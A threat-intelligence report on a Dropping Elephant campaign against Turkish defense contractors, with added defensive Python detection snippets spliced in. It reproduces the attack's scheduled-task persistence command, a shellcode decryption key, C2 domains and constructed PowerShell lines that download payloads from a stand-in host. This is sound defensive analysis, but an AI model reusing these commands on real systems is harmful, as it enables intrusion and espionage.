Dropping Elephant APT Group Targets Turkish Defense Industry With New Campaign and Capabilities: LOLBAS, VLC Player, and Encrypted Shellcode

The Arctic Wolf Labs team has uncovered a new campaign by APT group Dropping Elephant targeting major Turkish defense contractors and weapons manufacturers.
Executive Summary

The Arctic Wolf® Labs team has identified a new campaign by cyber-espionage group Dropping Elephant targeting Turkish defense contractors, specifically a manufacturer of precision-guided missile systems. The campaign employs a five-stage execution chain delivered via malicious LNK files disguised as conference invitations sent to targets interested in learning more about unmanned vehicle systems.

The attack leverages legitimate binaries (VLC Media Player and Microsoft Task Scheduler) for defense evasion through DLL side-loading techniques. This represents a significant evolution of this threat actor’s capabilities, transitioning from the x64 DLL variants observed in November 2024 to the current x86 PE executables with enhanced command structures.

The campaign’s timing appears to coincide with heightened Türkiye*-Pakistan defense cooperation and recent India-Pakistan military tensions, suggesting the targeting may be geopolitically motivated. Infrastructure analysis reveals deliberate operational security measures, including the impersonation of legitimate websites for command-and-control (C2) infrastructure.

The campaign demonstrates how threat actors combine social engineering with precisely crafted lures to gather strategic intelligence from their targets. In this blog, we’ll break down the attack step-by-step to show how this is achieved, as well as discussing proactive steps organizations can take to defend themselves against this type of attack.

* The Republic of Turkey changed its official name to The Republic of Türkiye on 26 May 2022.

Key Intelligence Findings:

Threat Attribution and Evolution

  • Threat Actor: Dropping Elephant (aka Patchwork or Quilted Tiger).
  • Technical Evolution: Diversification from x64 DLL to x86 PE architecture, with reduced library dependencies.
  • Campaign Scope: Multi-country targeting in prior campaigns, with Türkiye-specific operational focus in this specific campaign.

Attack Methodology

  • Initial Access: Spear-phishing, with conference-themed LNK files.
  • Execution: Five-component PowerShell-based download chain from malicious domain expouav[.]org.
  • Defense Evasion: VLC DLL side-loading, file extension manipulation, scheduled task persistence.
  • Command Structure: Enhanced C2 protocol, using C-standard library’s strtok() for parsing and CreateThread execution.

Target Profile

  • Primary Target: A Turkish precision-guided systems manufacturer.
  • Sector: Defense industrial base, specifically missile and rocket systems.
  • Geopolitical Context: Türkiye’s military cooperation with Pakistan amid regional tensions.

Infrastructure Assessment

  • Delivery: expouav[.]org (created 2025-06-25). This malicious domain mimics the legitimate conference website waset.org.
  • C2: roseserve[.]org (registered 2025-06-23). This malicious site impersonates the Pardus project, a Linux distribution project developed with support from the government of Türkiye.
  • Hosting: DEDIPATH-LLC/STARK-INDUSTRIES (U.S./GB hosting for Türkiye-focused operations).
  • PTR record for 2.56.127[.]187 points to tk99671283030[.]avanetco[.]com (created 2025-06-27). Avanetco is a virtual private server (VPS) reseller headquartered in Iran.
  • Operational timeline: Infrastructure preparation began in June 2025 and has been in active operation since July 2025.

Introducing Dropping Elephant

Dropping Elephant (also known as Patchwork or Quilted Tiger) is a relatively new advanced persistent threat (APT) group suspected to be of Indian origin. First identified in December 2015, the group has been observed using social engineering techniques, including spear-phishing and watering hole attacks, which involve compromising or impersonating legitimate websites known to be frequented by the group’s targets.

It has also been known to exploit malware distribution vulnerabilities, and has used fake downloadable apps to drop malware such as VajraSpy, an Android-targeted remote access trojan (RAT), and BADNEWS RAT.

Based on campaign analysis, Dropping Elephant’s primary motivation is most likely espionage. Initially targeting South and Southeast Asia, the group has since expanded its sights to include victims worldwide, including Europe and the United States. It uses a range of custom tooling and techniques for intelligence-gathering, particularly focusing on individuals, organizations and sectors with diplomatic and economic ties to China.

The industry sectors most highly targeted by this APT group to date include Defense, Energy, Financial, Government, IT, Aviation, NGOs, Think Tanks, and Pharmaceutical.

Attack Chain Breakdown

1. The Conference Invitation

The threat actor kicks off the attack by delivering a malicious LNK file to the intended targets:

Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk

The lure presents itself as an opportunity for defense industry professionals working on drone and missile technologies to attend a conference. The technical details of this file are shown in the table below.

Name: Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk
SHA-256: 341f27419becc456b52d6fbe2d223e8598065ac596fa8dec23cc722726a28f62
File Type/Signature: .lnk file
Size: 5.11 KB

Figure 1: Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk structure.

Upon execution, the LNK file invokes PowerShell, which in turn reaches out via Wget to a Cloudflare-protected hosting site – expouav[.]org – and retrieves several files.

Pester.bat is a Windows batch file that is part of the PowerShell Pester testing framework. It’s classified as a Living Off the Land Binary and Script (LOLBAS) due to its potential for abuse by threat actors. In this campaign, extra quotation marks are inserted into the commands by the threat actor to evade common string-matching detections for potentially suspicious commands.

As part of the process of establishing persistence, a scheduled task is created which abuses VLC, the popular legitimate media player software, to side-load malicious DLL files. VLC Media Player’s popularity springs a trap on the unwitting targets, playing on the user’s trust in familiar software to help advance the threat actor’s attack chain.

2. Silent Execution

The PowerShell code is executed in a manner which enables it to bypass restrictions (should they be enabled) as well as hide any progress indicators of its functionality from the user, to remain stealthy during execution.

"sleep 1;$ProgressPreference = 'SilentlyContinue'"
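As an added defensive illustration (not code from the Arctic Wolf post), the following Python snippet normalizes command lines before matching, so that the quote-insertion trick described above for Pester.bat, and the silenced-progress PowerShell invocation, no longer slip past simple string matching. The sample command lines, the delivery host delivery.example and the file names in them are constructed for the demonstration; the indicator list is illustrative rather than a complete signature set.

```python
import re

# Constructed command lines, not taken from the original post. The second and
# third mimic the quote-insertion trick (stray "" pairs inside tokens); the
# download host and file names are placeholders.
SAMPLE_CMDLINES = [
    r'''powershell -ep 1 -c "sleep 1;$ProgressPreference = 'SilentlyContinue'; wget https://delivery.example/lama -OutFile C:\Windows\Tasks\vlc.exee"''',
    r'''powershell -e""p 1 -c "sle""ep 1;$Prog""ressPreference = 'Silently""Continue'; wg""et https://delivery.example/lake -OutFile C:\Win""dows\Tasks\libvlc.dlll"''',
    r'''cmd.exe /c Pes""ter.bat "C:\Windows\Tasks\stage.ps1"''',
    r'''powershell.exe -NoProfile -Command "Get-Date"''',
]

# Indicators drawn from the chain described above; all patterns are written
# against the lowercased, quote-stripped form of the command line.
INDICATORS = {
    "pester_lolbas": re.compile(r"pester\.bat"),
    "progress_silenced": re.compile(r"\$progresspreference\s*=\s*silentlycontinue"),
    "execution_policy_flag": re.compile(r"(?:^|\s)-(?:ep|ex|executionpolicy)\s+\S+"),
    "downloader": re.compile(r"\b(?:wget|iwr|curl|invoke-webrequest)\b"),
    "tasks_folder_drop": re.compile(r"windows\\tasks\\"),
}


def normalize_cmdline(cmdline):
    """Strip the characters an attacker can sprinkle into a command line
    without changing what the shell runs: double and single quotes, and the
    cmd.exe caret escape. Then collapse whitespace and lowercase."""
    s = cmdline.replace('"', "").replace("'", "").replace("^", "")
    return re.sub(r"\s+", " ", s).strip().lower()


def match_indicators(cmdline):
    """Indicator names that fire on the normalized command line."""
    norm = normalize_cmdline(cmdline)
    return [name for name, rx in INDICATORS.items() if rx.search(norm)]


def naive_hits(cmdline):
    """Same patterns run on the raw (only lowercased) line, to show what the
    inserted quotes hide from a matcher that does not normalize."""
    raw = cmdline.lower()
    return [name for name, rx in INDICATORS.items() if rx.search(raw)]


def main():
    for line in SAMPLE_CMDLINES:
        print(f"raw-match={naive_hits(line)!s:55} normalized-match={match_indicators(line)}")


if __name__ == "__main__":
    main()
```

Normalizing before matching is the point; the first two sample lines differ only in inserted quotes, and the normalized matcher reports the same indicators for both, while the naive matcher reports nothing for the obfuscated one. Feed the normalized line, not the raw one, to SIEM rules, and extend the normalization to PowerShell's own tricks (backtick escapes, string concatenation) as your telemetry warrants.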

3. Downloads Multiple Files from expouav[.]org

The expouav[.]org domain referenced within the LNK file was registered on 06/25/2025. It hosts a PDF lure mimicking https://waset.org/unmanned-vehicle-systems-conference-in-july-2025-in-istanbul (a legitimate website). The real conference name is “ICUVS 2025: 19. International Conference on Unmanned Vehicle Systems”, and it takes place on July 28th and 29th, 2025 in Istanbul, Türkiye.

Figure 2: Legitimate waset.org website with the same conference information used by the fake PDF-based replica.

Assets used in the PDF lure were copied from the official website. The copy is nearly identical and even includes the original conference code.

The PDF document serves as a visual decoy, designed to distract the user while the rest of the execution chain runs silently in the background.

Figure 3: Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf PDF lure content.

This targeting occurs as Türkiye commands 65% of the global UAV export market and develops critical hypersonic missile capabilities, while simultaneously strengthening defense ties with Pakistan during a period of heightened India-Pakistan tensions.

The targeting specifically reflects the strategic value, to intelligence services, of technologies that reveal Türkiye’s and possibly NATO’s capabilities. Access to NATO-standard defense technologies and interoperability protocols provides insight into Western military capabilities and strategic planning.

4. File Evasion Technique

The simultaneous download of five distinct files represents a carefully orchestrated operation. Each component serves a specific purpose.

Files are dropped to the user’s Tasks folder, with additional characters in the extension to bypass detection by security systems. Once the file is saved to disk, the command automatically removes the extra characters, leaving the file with an executable extension, ready to run.

Detailed Technical Analysis

The first stage of the execution of Dropping Elephant’s attack chain is a .LNK file that contains PowerShell code. This script loads five files sequentially:

1. Visual Lure for Distraction

File: Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf
SHA-256: 588021b5553838fae5498de40172d045b5168c8e608b8929a7309fd08abfaa93

2. Legitimate VLC Video Player File

VLC Video Player is a free and open-source cross-platform multimedia player from VideoLAN, a non-profit organization. The player itself is legitimate, but (as with many digital tools) can be abused by cybercriminals.

Original downloaded name: “lama” → renamed to C:\Windows\Tasks\vlc.exe

SHA-256: 4cc729b554326ccc62205d46b95353dcb34cadf095b904e941814e902e0925b2

Figure 4: Legitimate VLC.exe file information.

3. Malicious DLL Library

Original file name: “lake” → renamed to libvlc.dll
Purpose: This library is responsible for running and decoding the shellcode.

SHA-256: 2cd2a4f1fc7e4b621b29d41e42789c1365e5689b4e3e8686b80f80268e2c0d8d

Project file name: newdll.dll
Compilation date: 2025-06-26 08:54:47

4. Legitimate Microsoft Task Scheduler

Original downloaded name: “dalai” → renamed to C:\Windows\Tasks\Winver.exe
Description: Legitimate Microsoft Task Scheduler file

SHA-256: 013c013e0efd13c9380fad58418b7aca8356e591a5cceffdb910f7d8b0ad28ef

Figure 5: Legitimate schtasks.exe (Microsoft Task Scheduler).

5. Encrypted Shellcode

File: vlc.log
Location: C:\Windows\Tasks\vlc.log

SHA-256: 89ec9f19958a442e9e3dd5c96562c61229132f3acb539a6b919c15830f403553

Figure 6: Encrypted shellcode.

Execution Process

The following command creates a scheduled task using PowerShell and the previously downloaded, legitimate Microsoft Schtasks.exe file:

PowerShell scheduled task:

saps "C:\Windows\Tasks\Winver" -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr', "C:\Windows\Tasks\vlc", '/f';

This scheduled task executes a legitimate VLC Player file which runs a DLL. The DLL acts as a shellcode loader that decrypts the ciphertext shellcode stored in vlc.log. The payload is launched in the VLC Player memory address space.
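The two detection opportunities in this step are the task-creation command itself and the side-load that follows it. The Python below is an added example (not code from the Arctic Wolf post or the VLC project): it parses the scheduled-task command quoted above into its schtasks options and applies a few path rules, and it checks image-load events for a watch-listed DLL loaded from anywhere other than its expected directory. The image-load events are constructed, and the VLC install path used as the expected directory is an assumption to verify against your own software inventory.

```python
import ntpath
import re

# Scheduled-task creation command quoted in the section above.
SAMPLE_TASK_CMD = r'''saps "C:\Windows\Tasks\Winver" -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr', "C:\Windows\Tasks\vlc", '/f';'''

# Constructed image-load events (Sysmon Event ID 7 style), not telemetry from
# the original post: a side-load from the staging folder and a legitimate load
# from the default VLC install directory (an assumed path).
SAMPLE_IMAGE_LOADS = [
    {"process": r"C:\Windows\Tasks\vlc.exe", "image": r"C:\Windows\Tasks\libvlc.dll"},
    {"process": r"C:\Program Files\VideoLAN\VLC\vlc.exe",
     "image": r"C:\Program Files\VideoLAN\VLC\libvlc.dll"},
]

# Staging folders a task action should not launch from (extend from your own
# baseline); C:\Windows\Tasks is the one used by this chain.
SUSPICIOUS_ACTION_DIRS = {r"c:\windows\tasks", r"c:\users\public", r"c:\programdata"}
# Where the real schtasks.exe lives; a task created through any other binary
# (here a renamed copy in the Tasks folder) deserves a look.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# DLLs abused for side-loading, mapped to the directory their legitimate host
# loads them from (assumed default VLC install path).
SIDELOAD_WATCHLIST = {"libvlc.dll": r"c:\program files\videolan\vlc"}

_TOKEN = re.compile(r'"([^"]*)"|\'([^\']*)\'|([^\s,;]+)')


def tokenize(cmdline):
    """Split a PowerShell/cmd style line into bare tokens: a quoted string is
    one token, commas and semicolons are separators."""
    return [g for m in _TOKEN.finditer(cmdline) for g in m.groups() if g]


def parse_schtasks_args(args):
    """Turn schtasks.exe-style `/option value` pairs into a dict; options
    without a value (/Create, /f) map to True."""
    opts, i = {}, 0
    while i < len(args):
        key = args[i].lower()
        if key.startswith("/") and i + 1 < len(args) and not args[i + 1].startswith("/"):
            opts[key] = args[i + 1]
            i += 2
        else:
            opts[key] = True
            i += 1
    return opts


def parse_task_creation(cmdline):
    """Return (creator_binary, options) for a direct `schtasks /Create ...`
    line or the Start-Process form (`saps <exe> -a ...`) used above."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None, {}
    if tokens[0].lower() in ("saps", "start-process"):
        idx = next((i for i, t in enumerate(tokens) if t.lower() in ("-a", "-argumentlist")), 1)
        return tokens[1], parse_schtasks_args(tokens[idx + 1:])
    return tokens[0], parse_schtasks_args(tokens[1:])


def assess_task(cmdline):
    """Apply the path and schedule rules to a task-creation command line."""
    creator, opts = parse_task_creation(cmdline)
    if not creator or "/create" not in opts:
        return []
    findings = []
    creator_dir = ntpath.dirname(creator).lower()
    if creator_dir and creator_dir not in SYSTEM_DIRS:
        findings.append(f"task created through non-system binary {creator}")
    action = opts.get("/tr")
    if isinstance(action, str):
        if ntpath.dirname(action).lower() in SUSPICIOUS_ACTION_DIRS:
            findings.append(f"task action staged in {ntpath.dirname(action)}")
        if not ntpath.splitext(action)[1]:
            findings.append(f"task action has no file extension: {action}")
    if str(opts.get("/sc", "")).lower() == "minute":
        findings.append("task re-runs every minute")
    return findings


def assess_image_load(event):
    """Flag a watch-listed DLL loaded from anywhere but its expected directory."""
    dll = ntpath.basename(event["image"]).lower()
    expected = SIDELOAD_WATCHLIST.get(dll)
    loaded_dir = ntpath.dirname(event["image"]).lower()
    if expected is None or loaded_dir == expected:
        return None
    beside_host = ntpath.dirname(event["process"]).lower() == loaded_dir
    where = "beside the host binary" if beside_host else "outside the install directory"
    return f"{dll} loaded by {event['process']} from {loaded_dir} ({where})"


def main():
    for finding in assess_task(SAMPLE_TASK_CMD):
        print("task:", finding)
    for event in SAMPLE_IMAGE_LOADS:
        print("image load:", assess_image_load(event) or "ok")


if __name__ == "__main__":
    main()
```

Against the command above the task rules fire four times (non-system creator, staging folder, extension-less action, one-minute repeat), and the image-load rule fires only for the copy of libvlc.dll sitting next to the relocated vlc.exe. The watch-list and directory sets are the part to grow from your own environment; the parsing is deliberately tolerant so the same function handles plain schtasks invocations.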

Shellcode Decryption

Decryption key: “76bhu93FGRjZX5hj876bhu93FGRjX5”

Figure 7: Shellcode decryption code.

Once decrypted, the shellcode becomes the final payload:

Name: N/A
SHA-256: 8b6acc087e403b913254dd7d99f09136dc54fa45cf3029a8566151120d34d1c2
File Type/Signature: x86 PE
Size: 139.37 KB (142,712 bytes)
Declared Timestamp: Fri Jul 26 09:12:19 2024

Figure 8: Decrypted shellcode header.

Digital Reconnaissance

Once executed in the system, the malware performs a series of actions that facilitate profiling of the infected device:

  • Creates mutex ghjghkj to prevent multiple instances from running at once.
  • Gathers victim’s computer name via GetComputerNameW.
  • Collects username via GetUserNameW.
  • Retrieves system firmware information.
  • Checks processor features and capabilities for sandboxing evasion.
  • Performs system time and performance counter queries.
  • Takes screenshots of the screen and saves them as JPGs for C2 upload. This technique can be particularly useful when the targeted users work in a remote environment, where the sought-after data is stored not on the infected endpoint, but on a remote server. Screen-capturing is therefore vital to capture sensitive data, such as diagrams or classified projects stored on a clean remote server.

Figure 9: Screenshot-capture command.

Network Communication

To assess outside network connectivity, several external sites are queried.

External services contacted:

  • com/raw is used to determine external IP address
  • iplocation.net/?cmd=ip-country is used for geolocation
  • co is used for additional IP information
  • Mozilla/5.0 user-agent is used to blend with legitimate traffic

Command and Control:

C2 Server: roseserve[.]org

Figure 10: The threat actor’s C2 server.

Reporting to C2 is based on the /post action, with structured parameters.

Figure 11: /post action via YcKOjLMxiwCZfSS//comrCVPEffFiPvF.php to C2.

Dropping Elephant’s RAT: Version Comparison Analysis

When comparing code between older versions of Dropping Elephant’s RAT from November 2024 and newer versions, we observed several key differences:

Architecture Change

  • New version: x86 EXE executable
  • Old versions: x64 DLL

Referential Samples:

November 2024 version: 01a635a11a140aef906efe9db22fb66b0d6510e1e702870c4c728099fd5ab455
Version targeting Türkiye: 8b6acc087e403b913254dd7d99f09136dc54fa45cf3029a8566151120d34d1c2

Code Optimization

Another notable difference is that the threat group has begun using fewer library functions. For example, C2 command parsing in the new version is done with hand-written comparison code, while the old version relied on memcmp, the C standard library function that compares the contents of two memory blocks.

Command Processing

After receiving C2 commands, the code compares them against a command list and then, using CreateThread, hands execution to the thread for the matching command. Any string received from the server is first split into tokens using the strtok function with ‘$’ as the delimiter.

Figure 12: Splitting into tokens with ‘$’ delimiter.
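Analysts writing a decoder for captured tasking strings need to reproduce strtok semantics exactly, and those differ from the split routines most scripting languages offer: strtok treats a run of delimiters as one separator, skips leading and trailing delimiters, and never returns an empty token. The Python below is an added example, not code from the post or from the implant, that emulates that behaviour over constructed tasking strings (the command tokens are those listed in the Remote Control Arsenal section; the argument values are invented for the demonstration).

```python
# Constructed tasking strings, not captured traffic. The layout (command token
# first, '$'-separated arguments after it) follows the description above; the
# argument values are invented.
SAMPLE_TASKINGS = [
    "3gjdfghj6$whoami /all",
    "3SC3",
    "$$3ngjfng5$$C:\\Users\\Public\\report.jpg$",
]

# Command tokens listed in the Remote Control Arsenal section.
KNOWN_COMMANDS = {"3Up3", "3gnfm9", "3gjdfghj6", "3ngjfng5", "3CRT3", "3APC3", "3SC3"}


def strtok_split(text, delims="$"):
    """Emulate a C strtok() loop: a run of delimiter characters is a single
    separator, leading/trailing delimiters are skipped, and no empty token is
    ever produced. str.split() does none of these, so a decoder built on it
    would mis-align arguments whenever the server doubles a delimiter."""
    tokens, current = [], []
    for ch in text:
        if ch in delims:
            if current:
                tokens.append("".join(current))
                current = []
        else:
            current.append(ch)
    if current:
        tokens.append("".join(current))
    return tokens


def decode_tasking(text):
    """Split a server string the way the implant does and return
    (command, arguments, is_known_command) for analyst triage."""
    tokens = strtok_split(text)
    if not tokens:
        return None, [], False
    cmd, args = tokens[0], tokens[1:]
    return cmd, args, cmd in KNOWN_COMMANDS


def main():
    for s in SAMPLE_TASKINGS:
        cmd, args, known = decode_tasking(s)
        print(f"{s!r:45} -> cmd={cmd!r} args={args} known={known}")
        print(f"{'':45}    str.split would give {s.split('$')}")


if __name__ == "__main__":
    main()
```

The third sample is the instructive one: strtok yields exactly two tokens from it, whereas a naive split produces five, three of them empty, which would shift every argument by one position. When building detections on decoded traffic, decode with the same semantics the implant uses, or the field you alert on will not be the field the implant acts on.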

Network Infrastructure Analysis

roseserve[.]org serves as the malicious C2 for the attack we observed on Türkiye.

Infrastructure Details:

  • PTR DNS record: tk99671283030.avanetco.com (avanetco.com is a legitimate commercial web hosting provider headquartered in Iran).
  • Title response: “Pardus – TÜBİTAK”
  • Redirect: Clicking “Turkish language” takes you to https://pardus.org.tr/en/ (a legitimate website with a very similar design). This choice demonstrates cultural and technical knowledge of the technology landscape in Türkiye, and the country’s technological independence.

Figure 13: Fake website hosted on roseserve[.]org, mimicking the legitimate Pardus website.

Timeline:

  • June 12-18, 2025: Threat actor prepares and configures 2.56.127[.]187.
  • June 23, 2025: roseserve[.]org domain is purchased.
  • June 29, 2025: Historical snapshot shows an impersonation of the Anadolu Agency (a news agency headquartered in Türkiye) website – see Figure 14, below.

Figure 14: An early attempt at impersonating a real news agency’s website on roseserve[.]org.

Hosting Information:

The C2 server roseserve[.]org runs on 2.56.127[.]187.

  • Owner: DEDIPATH-LLC
  • ASN: AS 35913
  • Country: U.S.
  • CIDRs: 2[.]56.127.0/24

Secondary owner: STARK-INDUSTRIES

  • ASN: AS 44477
  • Country: GB
  • CIDRs: 2[.]56.127.0/24

Website Comparison:

Hunting pivot for the fake Pardus banner (the raw HTML title string, including its surrounding newline and tab characters): \n\t\tPardus – TÜBİTAK\t

Original header: “Home – Pardus – TÜBİTAK” (TÜBİTAK is the Scientific and Technological Research Council of Türkiye, the developer of the Pardus operating system).

Original/legitimate pardus.org.tr: Points to real domain on IP address 193.140.63.90 (Türkiye).

Figure 15: Legitimate Pardus website.

Figure 16: Network infrastructure and implant deployment timeline.

Remote Control Arsenal:

The code receives data in this order: C2 command + arguments.

Available Commands:

  • 3Up3 – Downloads a file from a remote server, adds the .exe extension to it, and runs it. The URL is passed to this function as a parameter. This command transforms victim workstations into staging platforms for additional malware deployment, enabling the threat actor to adapt their tools based on discovered network data and security measures.
  • 3gnfm9 – Unknown function.
  • 3gjdfghj6 – Executes threat actor commands via cmd.exe and reports results to C2. It provides direct system access, enabling the threat actor to operate with the same privileges as a legitimate employee.
  • 3ngjfng5 – Uploads stolen data to C2.
  • 3CRT3 – Unknown function.
  • 3APC3 – Shellcode loader command: receives a filename and a process startup string. The process is launched via cmd, and the code injects the contents of the file into the running process. The process can be any process and the file can be any file, but the file must already exist on the system; it is most likely delivered to the victim using the other commands. In this handler, the code uses QueueUserAPC for asynchronous execution in a thread of the target process.
  • 3SC3 – Screenshot command: Takes a screenshot and sends it to the server. (“SC” in this command is likely an abbreviation for Screenshot)

Victimology

The target of the campaign analyzed in this report is Türkiye, which Dropping Elephant most likely seeks to undermine via their cyber-espionage campaign against a major Turkish defense contractor and weapons manufacturer headquartered in the country. The company specializes in space systems, air defense systems, land systems, naval systems, missile systems, ballistic systems, and subsystems.

How Arctic Wolf Protects Its Customers

Arctic Wolf is committed to ending cyber risk, and when active campaigns are identified, we move quickly to protect our customers.

Arctic Wolf Labs has leveraged threat intelligence around Dropping Elephant’s activity to implement new detections in the Arctic Wolf® Aurora™ Platform to protect customers. As we discover new information, we will enhance our detections to account for additional IOCs and techniques leveraged by this threat group.

Conclusion

The campaign analyzed in this blog exhibits highly strategic victim selection focused on Türkiye’s defense industrial base, specifically precision-guided weapons manufacturing capabilities. The timing of this targeted campaign aligns with Turkish military cooperation agreements with Pakistan, indicating the threat actor’s awareness of geopolitical developments and the opportunity to strategically exploit them through social engineering techniques.

Dropping Elephant demonstrates continued operational investment and development through architectural diversification from x64 DLL to x86 PE formats, and enhanced C2 protocol implementation through impersonation of legitimate websites.

The reduction in library dependencies and adoption of strtok-based command parsing indicates deliberate operational security improvements and codebase optimization by the group. The five-stage execution chain employs established living-off-the-land binaries and scripts (LOLBAS) techniques, with VLC DLL side-loading representing the primary evasion mechanism.

The two-month preparation timeline from domain registration (June 2025) to active operations (July 2025) suggests careful campaign execution planned well in advance of the July 28 – 29 Unmanned Vehicle Systems conference in Istanbul, Türkiye, rather than ad-hoc or indiscriminate targeting.

Recommendations

As with many historical Dropping Elephant campaigns, the group leverages social engineering and spear phishing emails to obtain initial access into victim environments. The group relies heavily on user interaction in their campaigns. Significant effort is put into creating convincing lures and enticing emails that victims are more likely to interact with; in this case, centered around the upcoming conference about UAVs in Istanbul, Türkiye.

Social engineering and phishing emails are not completely remediated with security controls. However, educating users about the risks of interacting with unsolicited emails, particularly if the emails originate from outside their organization or call for urgent action, is a good start. Adding a “report phishing” button to your organization’s email solution can empower users to report suspected phishing emails to your Security Operations Center (SOC) or IT security team.

User education, such as general security awareness training, is one of the important elements in preventing Dropping Elephant and other groups from obtaining access to your organization. Ensure all employees are aware of good security hygiene practices. Fostering a culture where employees feel safe reporting suspected phishing attempts or potential security breaches can greatly increase your organization’s chances of preventing a successful compromise.

For those without the time to devote to creating security training resources from scratch, the Arctic Wolf Managed Security Awareness® training solution delivers easily digestible security lessons for employees, including regular phishing simulations and a “Report Phish” button, along with many other features.

Dropping Elephant’s primary motivation is espionage, focusing on obtaining long-term access to sensitive business and military information. Recognizing this, network segmentation, or isolating sensitive information, can help reduce your attack surface. Network segmentation limits where a threat actor can move through your environment and confines them to patient zero.

Also ensure your organization enforces the Principle of Least Privilege, both at the user level as well as the network level, to prevent threat groups from obtaining additional access if compromised.

Some additional methods you might consider include:

  • Patch Often, Update Always: The entire attack surface of an organization is fair game for a sophisticated threat actor, from the gateways and endpoints to the networks and servers. Organizations should make sure to keep applications and operating systems regularly updated, and consider employing virtual patching for legacy systems.
  • Put Proactive Defenses in Place: Intrusion prevention and detection systems have their place among firewalls and sandboxes to prevent attackers from exploiting security gaps. Endpoint Detection and Response (EDR) platforms can uncover hidden red flags before it’s too late, so consider implementing enterprise solutions such as Arctic Wolf® Aurora™ Endpoint Defense.
  • Enforce “Least Privilege” Principles: Lock down tools or block the use of tools normally reserved for system administrators. Behavior monitoring and application control can block unusual or suspicious routines executed by suspicious files.
  • Consider the use of Secure Email Gateway solutions, to help proactively filter out malicious emails.
  • By leveraging the Windows Defender Application Control in Microsoft Windows, organizations can assess which tools, software and applications are used within their digital environments. Locking down or continually reassessing such lists may reduce the likelihood of threat actors leveraging Living-off-the-Land (LOTL) binaries within their environment.
  • Staffing a Security Operations Center to protect your company is a costly endeavor, and may not be feasible for many organizations. Arctic Wolf® Managed Detection and Response (MDR) provides 24×7 monitoring of your networks, endpoints, and cloud environments to detect, respond to, and remediate modern cyberattacks.
  • Finally, consider leveraging contextual cyber threat intelligence (CTI) to build an organizational risk profile and maintain updated threat models based on the geolocation, business profile and vertical your organization operates in. Such an intelligence program can help organizations to anticipate attacks and prioritize defenses based on the knowledge of the adversary and their tradecraft.

Appendix

YARA Hunting and Detection Rule

rule Dropping_Elephant_RAT {
    meta:
        description = "Rule for detecting Dropping Elephant RAT"
        last_modified = "2025-07-16"
        author = "The Arctic Wolf Labs team"
        version = "1.0"
        sha256 = "8b6acc087e403b913254dd7d99f09136dc54fa45cf3029a8566151120d34d1c2"
    strings:
        $a1 = "%s=33up$!!$%s$!!$%s" ascii wide
        $a2 = "%s=uep$@$%s$@$%s" ascii wide
        $a3 = "%s=%s$!!$%s" ascii wide
        $a4 = "%s=%s$!!$%s$!!$%s" ascii wide
        $a5 = "%s=%s!$$$!%s" ascii wide
        $a6 = "%s=%s!@!%s!@!%lu" ascii wide
        $a7 = "%s=%s!$$$!%s!$$$!%s" ascii wide
        $a8 = "%s=error@$$@%s@$$@%s" ascii wide
        $a9 = "%s=%s$!!$%s$!!$%s$!!$%s$!!$%s$!!$%s$!!$" ascii wide
    condition:
        (uint16(0) == 0x5A4D) and (filesize < 1MB) and (all of ($a*))
}
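To test what the rule above actually matches without a YARA installation, here is an added Python re-implementation of its condition (not code from the Arctic Wolf post): it searches for each string in both the forms a YARA `ascii wide` modifier implies, the raw ASCII bytes and the UTF-16LE encoding, checks the MZ header and the 1 MB size bound, and reports which strings a near-miss buffer lacks. The buffers it evaluates are constructed test data, not samples.

```python
import struct

# The strings from the YARA rule above, in the same order ($a1 .. $a9).
RULE_STRINGS = [
    "%s=33up$!!$%s$!!$%s",
    "%s=uep$@$%s$@$%s",
    "%s=%s$!!$%s",
    "%s=%s$!!$%s$!!$%s",
    "%s=%s!$$$!%s",
    "%s=%s!@!%s!@!%lu",
    "%s=%s!$$$!%s!$$$!%s",
    "%s=error@$$@%s@$$@%s",
    "%s=%s$!!$%s$!!$%s$!!$%s$!!$%s$!!$%s$!!$",
]
MAX_FILESIZE = 1024 * 1024  # YARA's "1MB"


def string_variants(s):
    """Byte patterns YARA searches for a string tagged `ascii wide`:
    the plain ASCII bytes and the UTF-16LE ("wide") encoding."""
    return s.encode("ascii"), s.encode("utf-16-le")


def string_present(data, s):
    return any(pattern in data for pattern in string_variants(s))


def missing_strings(data):
    """Rule strings absent from the buffer; useful when tuning a near-miss."""
    return [s for s in RULE_STRINGS if not string_present(data, s)]


def matches_rule(data):
    """Evaluate the rule's condition: uint16(0) == 0x5A4D (the bytes "MZ"
    read little-endian), filesize < 1MB, and all of ($a*)."""
    if len(data) < 2 or struct.unpack_from("<H", data, 0)[0] != 0x5A4D:
        return False
    if len(data) >= MAX_FILESIZE:
        return False
    return not missing_strings(data)


def build_sample(strings, wide=False, mz=True):
    """Constructed test buffer, not a real sample: a 64-byte MZ-style stub
    followed by the strings, NUL separated, as ASCII or UTF-16LE."""
    header = (b"MZ" if mz else b"\x00\x00") + b"\x90" * 62
    encoding = "utf-16-le" if wide else "ascii"
    return header + b"\x00".join(s.encode(encoding) for s in strings)


def main():
    cases = {
        "ascii strings": build_sample(RULE_STRINGS),
        "wide strings": build_sample(RULE_STRINGS, wide=True),
        "one string missing": build_sample(RULE_STRINGS[:-1]),
        "no MZ header": build_sample(RULE_STRINGS, mz=False),
        "over 1MB": build_sample(RULE_STRINGS) + b"\x00" * MAX_FILESIZE,
    }
    for name, data in cases.items():
        print(f"{name:20} match={matches_rule(data)!s:5} missing={missing_strings(data)}")


if __name__ == "__main__":
    main()
```

Two details worth knowing when adapting the rule: `$a3` is a substring of `$a4` and of `$a9`, and `$a5` is a substring of `$a7`, so those shorter strings can never be the ones that fail; the rule's precision comes from `all of` requiring the distinctive longer formats together with the MZ check. The emulation is for understanding and unit-testing the logic; for production scanning use YARA itself, which also handles the `wide` search correctly at any alignment.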


Indicators of Compromise (IOCs)

File Indicators

  • Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.lnk – 341f27419becc456b52d6fbe2d223e8598065ac596fa8dec23cc722726a28f62
  • Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf – 588021b5553838fae5498de40172d045b5168c8e608b8929a7309fd08abfaa93
